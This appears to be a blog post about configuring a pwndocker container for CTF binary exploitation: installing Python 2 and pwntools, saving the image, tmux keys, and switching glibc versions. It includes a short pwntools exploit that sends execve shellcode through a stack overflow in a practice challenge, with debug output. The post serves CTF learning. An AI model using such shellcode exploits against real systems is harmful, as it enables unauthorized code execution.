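Configuring a pwn environment from scratch: tuning the pwndocker configuration

1. Background

Configuring a Kali 2023 environment from scratch: setting up a pwn debugging environment (CSDN blog)

After installing pwndocker earlier, I found it awkward to use, so I looked into it and changed some of the configuration until it met the needs of solving challenges.

2. Problems encountered and how they were solved

1. The pwndocker Docker environment has no Python 2 environment. Many pwn challenge solutions need Python 2, so it has to be added.

Installing a Python 2 environment inside the pwndocker container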

┌──(holyeyes㉿kali2023)-[~/Re]
└─$ cd 2
┌──(holyeyes㉿kali2023)-[~/Re/2]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes: 
root@446f4b4dbc7d:/ctf/work# ls
2  wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.py
root@446f4b4dbc7d:/ctf/work#  curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1863k  100 1863k    0     0  1026k      0  0:00:01  0:00:01 --:--:-- 1026k
root@446f4b4dbc7d:/ctf/work# ls
2  get-pip.py  wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.py
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pip<21.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/79/8a850fe3496446ff0d584327ae44e7500daf6764ca1a382d2d02789accf7/pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 1.2 MB/s
Collecting setuptools<45
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/e1/b7/182161210a13158cd3ccc41ee19aadef54496b74f2817cc147006ec932b4/setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
     |████████████████████████████████| 583 kB 37.3 MB/s
Collecting wheel
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/d6/003e593296a85fd6ed616ed962795b2f87709c3eee2bca4f6d0fe55c6d00/wheel-0.37.1-py2.py3-none-any.whl (35 kB)
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.37.1
root@446f4b4dbc7d:/ctf/work# sudo apt install python2-pip
bash: sudo: command not found
root@446f4b4dbc7d:/ctf/work# apt install python2-pip
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package python2-pip
root@446f4b4dbc7d:/ctf/work# apt-get install python-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Note, selecting 'python-dev-is-python2' instead of 'python-dev'
The following additional packages will be installed:
  libpython2-dev libpython2.7 libpython2.7-dev python-is-python2
  python2-dev python2.7-dev
The following NEW packages will be installed:
  libpython2-dev libpython2.7 libpython2.7-dev python-dev-is-python2
  python-is-python2 python2-dev python2.7-dev
0 upgraded, 7 newly installed, 0 to remove and 89 not upgraded.
Need to get 3,809 kB of archives.
After this operation, 17.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] 
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7 amd64 2.7.18-1~20.04.3 [1,037 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7-dev amd64 2.7.18-1~20.04.3 [2,466 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal/universe amd64 libpython2-dev amd64 2.7.17-2ubuntu4 [7,140 B]
Get:4 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-is-python2 all 2.7.17-4 [2,496 B]
Get:5 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 python2.7-dev amd64 2.7.18-1~20.04.3 [293 kB]
Get:6 http://archive.ubuntu.com/ubuntu focal/universe amd64 python2-dev amd64 2.7.17-2ubuntu4 [1,268 B]
Get:7 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-dev-is-python2 all 2.7.17-4 [1,396 B]
Fetched 3,809 kB in 4s (862 kB/s)           
Selecting previously unselected package libpython2.7:amd64.
(Reading database ... 56821 files and directories currently installed.)
Preparing to unpack .../0-libpython2.7_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2.7-dev:amd64.
Preparing to unpack .../1-libpython2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2-dev:amd64.
Preparing to unpack .../2-libpython2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-is-python2.
Preparing to unpack .../3-python-is-python2_2.7.17-4_all.deb ...
Unpacking python-is-python2 (2.7.17-4) ...
Selecting previously unselected package python2.7-dev.
Preparing to unpack .../4-python2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking python2.7-dev (2.7.18-1~20.04.3) ...
Selecting previously unselected package python2-dev.
Preparing to unpack .../5-python2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking python2-dev (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-dev-is-python2.
Preparing to unpack .../6-python-dev-is-python2_2.7.17-4_all.deb ...
Unpacking python-dev-is-python2 (2.7.17-4) ...
Setting up libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Setting up python-is-python2 (2.7.17-4) ...
Setting up python2.7-dev (2.7.18-1~20.04.3) ...
Setting up python2-dev (2.7.17-2ubuntu4) ...
Setting up python-dev-is-python2 (2.7.17-4) ...
Processing triggers for libc-bin (2.31-0ubuntu9.7) ...
root@446f4b4dbc7d:/ctf/work# pip2 install setuptools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: setuptools in /usr/local/lib/python2.7/dist-packages (44.1.1)
root@446f4b4dbc7d:/ctf/work# pip2 install pwntools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Successfully built capstone intervaltree scandir
Installing collected packages: psutil, six, python-dateutil, sortedcontainers, MarkupSafe, mako, idna, certifi, chardet, urllib3, requests, pygments, colored-traceback, pycparser, cffi, pynacl, bcrypt, enum34, ipaddress, cryptography, paramiko, unicorn, capstone, ropgadget, intervaltree, pyelftools, scandir, typing, pathlib2, pysocks, plumbum, rpyc, pyserial, pyparsing, packaging, pwntools
Successfully installed MarkupSafe-1.1.1 bcrypt-3.1.7 capstone-5.0.1 certifi-2021.10.8 cffi-1.15.1 chardet-4.0.0 colored-traceback-0.3.0 cryptography-3.3.2 enum34-1.1.10 idna-2.10 intervaltree-3.1.0 ipaddress-1.0.23 mako-1.1.6 packaging-20.9 paramiko-2.12.0 pathlib2-2.3.7.post1 plumbum-1.7.2 psutil-5.9.7 pwntools-4.11.1 pycparser-2.21 pyelftools-0.29 pygments-2.5.2 pynacl-1.4.0 pyparsing-2.4.7 pyserial-3.5 pysocks-1.7.1 python-dateutil-2.8.2 requests-2.27.1 ropgadget-7.4 rpyc-4.1.5 scandir-1.10.0 six-1.16.0 sortedcontainers-2.4.0 typing-3.10.0.0 unicorn-2.0.1.post1 urllib3-1.26.18

Saving the configured pwndocker environment as an image

┌──(holyeyes㉿kali2023)-[~]
└─$  sudo docker  ps 
[sudo] password for holyeyes: 
CONTAINER ID   IMAGE                COMMAND           CREATED       STATUS       PORTS                                           NAMES
446f4b4dbc7d   skysider/pwndocker   "/sbin/my_init"   7 hours ago   Up 7 hours   0.0.0.0:23946->23946/tcp, :::23946->23946/tcp   pwn_test
┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker commit 446f4b4dbc7d pwn_test:v1
┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker image ls
REPOSITORY             TAG       IMAGE ID       CREATED        SIZE
pwn_test               v1        202c1a800e25   5 hours ago    5.25GB
skysider/pwndocker     latest    26c0315bd8d9   2 months ago   5GB
keen4n/pwndocker1604   latest    4ff3687f7371   4 years ago    2.52GB

Updating docker-compose.yml

version: '3'
services:
  pwn:
    container_name: pwn_test1604
    image: pwn_test
    security_opt:
      - seccomp:unconfined
    cap_add:
      - SYS_PTRACE
    ports:
      - "23947:23947"
    volumes:
      - /home/holyeyes/Re:/ctf/work

Updating run.sh

docker-compose up -d
docker exec -it pwn_test1604 /bin/bash

┌──(holyeyes㉿kali2023)-[~/pwndocker1604]
└─$ sudo ./run.sh
[sudo] password for holyeyes: 
Pulling pwn (pwn_test:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.

Continue with the new image? [yN]


However, the experiment above failed, so the environment will have to be saved some other way.
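An added check, not from the original post: the container was committed as `pwn_test:v1`, while the compose file asks for `pwn_test`, and a Docker image reference with no tag means `:latest`; the `Pulling pwn (pwn_test:)...` line shows compose did not find that image locally. The sketch below resolves a reference with that default and looks it up in the `docker image ls` rows shown above (rows embedded as sample input; function names are illustrative).

```python
"""Resolve a compose `image:` value to repo:tag and check it against local images."""

# Rows copied from the `docker image ls` output shown on this page.
LOCAL_IMAGES_LS = """\
REPOSITORY             TAG       IMAGE ID       CREATED        SIZE
pwn_test               v1        202c1a800e25   5 hours ago    5.25GB
skysider/pwndocker     latest    26c0315bd8d9   2 months ago   5GB
keen4n/pwndocker1604   latest    4ff3687f7371   4 years ago    2.52GB
"""


def split_reference(ref):
    """Split an image reference into (repository, tag).

    A ':' only introduces a tag when it comes after the last '/'; before
    that it belongs to a registry host:port. A missing tag defaults to
    'latest'. Digest references (repo@sha256:...) are not handled here.
    """
    last_slash = ref.rfind("/")
    colon = ref.rfind(":")
    if colon > last_slash:
        return ref[:colon], ref[colon + 1:]
    return ref, "latest"


def parse_image_ls(text):
    """Return the set of (repository, tag) pairs from `docker image ls` output."""
    pairs = set()
    for line in text.splitlines()[1:]:      # skip the header row
        cols = line.split()
        if len(cols) >= 2:
            pairs.add((cols[0], cols[1]))
    return pairs


def check_reference(ref, ls_text=LOCAL_IMAGES_LS):
    """Report whether `ref` exists locally and which other tags the repo has."""
    repo, tag = split_reference(ref)
    local = parse_image_ls(ls_text)
    other_tags = sorted(t for r, t in local if r == repo and t != tag)
    return {
        "resolved": "%s:%s" % (repo, tag),
        "present": (repo, tag) in local,
        "other_local_tags": other_tags,
    }


if __name__ == "__main__":
    for ref in ("pwn_test", "pwn_test:v1", "skysider/pwndocker"):
        print("%s -> %s" % (ref, check_reference(ref)))
```

Writing `image: pwn_test:v1` in the compose file, or running `docker tag pwn_test:v1 pwn_test:latest`, makes the reference resolve to an image that exists locally.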

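2. tmux configuration does not take effect

Split left/right: ctrl+B+%

Split top/bottom: ctrl+B+"

Enable the mouse: ctrl+B+:set -g mouse on

After a long time getting nowhere, it turned out that inside the virtual machine ctrl has to be replaced with alt, that is:

Split left/right: alt+B+%

Split top/bottom: alt+B+"

Enable the mouse: alt+B+:set -g mouse on

3. The default libc environment in the Docker container is the Ubuntu 20.04 one and needs to be switched to the 16.04 one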

from pwn import *

p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})

See the pwndocker README: https://github.com/skysider/pwndocker

included glibc

Default compiled glibc path is /glibc.

2.19 —— ubuntu 12.04 default libc version
2.23 —— ubuntu 16.04 default libc version
2.24 —— introduce vtable check in file struct
2.27 —— ubuntu 18.04 default glibc version
2.31 —— ubuntu 20.04 default glibc version(built-in)
2.28~2.30, 2.33~2.36 —— latest libc versions

Q&A

How to run in custom libc version?

cp /glibc/2.27/64/lib/ld-2.27.so /tmp/ld-2.27.so
patchelf --set-interpreter /tmp/ld-2.27.so ./test
LD_PRELOAD=./libc.so.6 ./test

or

from pwn import *
p = process(["/path/to/ld.so", "./test"], env={"LD_PRELOAD":"/path/to/libc.so.6"})

I wrote a pwn script to test it:

from pwn import *

# Starts ./test under the bundled glibc 2.23 loader; this handle is replaced on the next line.
p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})
# The challenge binary is started directly, so everything below talks to this process.
p = process('./wdb_2018_3rd_soEasy')
#p = remote('node5.buuoj.cn',27285)
context.log_level='debug'
context.arch='i386'

p.recvuntil('->')
buf = int(p.recvuntil('\n', drop=True),16)  # address printed by the program
log.info('buf:'+hex(buf))
p.recvuntil('what do you want to do?')

shellcode = asm(shellcraft.sh())
print len(shellcode)

pl = ''
pl += shellcode
pl += (76-len(pl))*'a'
pl += p32(buf)

p.sendline(pl)
p.interactive()

┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes: 
root@446f4b4dbc7d:/ctf/work# cd 2
root@446f4b4dbc7d:/ctf/work/2# ls
exp.py  get-pip.py  wdb_2018_3rd_soEasy
root@446f4b4dbc7d:/ctf/work/2# python2 exp.py 
[+] Starting local process '/glibc/2.23/64/lib/ld-2.23.so': pid 1051
[+] Starting local process './wdb_2018_3rd_soEasy': pid 1053
[DEBUG] Received 0x38 bytes:
    'Hei,give you a gift->0xffeaf870\n'
    'what do you want to do?\n'
[*] buf:0xffeaf870
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
    .section .shellcode,"awx"
    .global _start
    .global __start
    _start:
    __start:
    .intel_syntax noprefix
    .p2align 0
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push '/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push 11 /* 0xb */
    pop eax
    int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-sp9wDe/step2 /tmp/pwn-asm-sp9wDe/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-sp9wDe/step3 /tmp/pwn-asm-sp9wDe/step4
44
[DEBUG] Sent 0x51 bytes:
    00000000  6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01  │jhh/│//sh│/bin│··h·│
    00000010  01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59  │····│4$ri│··1·│Qj·Y│
    00000020  01 e1 51 89  e1 31 d2 6a  0b 58 cd 80  61 61 61 61  │··Q·│·1·j│·X··│aaaa│
    00000030  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    00000040  61 61 61 61  61 61 61 61  61 61 61 61  70 f8 ea ff  │aaaa│aaaa│aaaa│p···│
    00000050  0a                                                  │·│
    00000051
[*] Switching to interactive mode
$
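
An added helper, not part of the original post or of pwndocker: the script above hands the 2.23 loader a placeholder `./test` from the `64` directory, while the challenge binary is i386 and is started by a plain `process()`. The sketch reads the ELF class byte to pick the matching directory and returns the argv/env pair for `process()`; the `32` directory name and the names `elf_bits` and `glibc_launch` are assumptions of this example.

```python
"""Build the argv/env for running an ELF under one of pwndocker's bundled glibcs."""
import os
import struct

GLIBC_ROOT = "/glibc"   # pwndocker's default compiled glibc path (from its README)

# e_ident[EI_CLASS] values from the ELF specification.
ELFCLASS32, ELFCLASS64 = 1, 2


def elf_bits(header):
    """Return 32 or 64 from the first bytes of an ELF file, or raise ValueError."""
    if len(header) < 5 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = struct.unpack("B", header[4:5])[0]
    if ei_class == ELFCLASS32:
        return 32
    if ei_class == ELFCLASS64:
        return 64
    raise ValueError("unknown EI_CLASS %d" % ei_class)


def glibc_launch(binary, version, header=None, root=GLIBC_ROOT, must_exist=True):
    """Return (argv, env) that run `binary` with the loader and libc of `version`.

    The <root>/<version>/<bits>/lib layout and the ld-<version>.so name follow
    the 64-bit paths used on this page (ld-2.23.so, ld-2.27.so); the 32-bit
    directory name is an assumption of this example.
    `header` lets a caller pass the ELF header bytes instead of reading the file.
    """
    if header is None:
        with open(binary, "rb") as fh:
            header = fh.read(16)
    bits = elf_bits(header)
    libdir = os.path.join(root, version, str(bits), "lib")
    loader = os.path.join(libdir, "ld-%s.so" % version)
    libc = os.path.join(libdir, "libc.so.6")
    if must_exist:
        # Fail early instead of silently running under the default libc.
        missing = [p for p in (loader, libc, binary) if not os.path.exists(p)]
        if missing:
            raise IOError("missing: " + ", ".join(missing))
    return [loader, binary], {"LD_PRELOAD": libc}


if __name__ == "__main__":
    # Constructed sample: the e_ident bytes of a 32-bit little-endian ELF.
    sample = b"\x7fELF\x01\x01\x01" + b"\x00" * 9
    argv, env = glibc_launch("./wdb_2018_3rd_soEasy", "2.23",
                             header=sample, must_exist=False)
    print("%s %s" % (argv, env))
    # Inside the container, with pwntools: p = process(argv, env=env)
```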
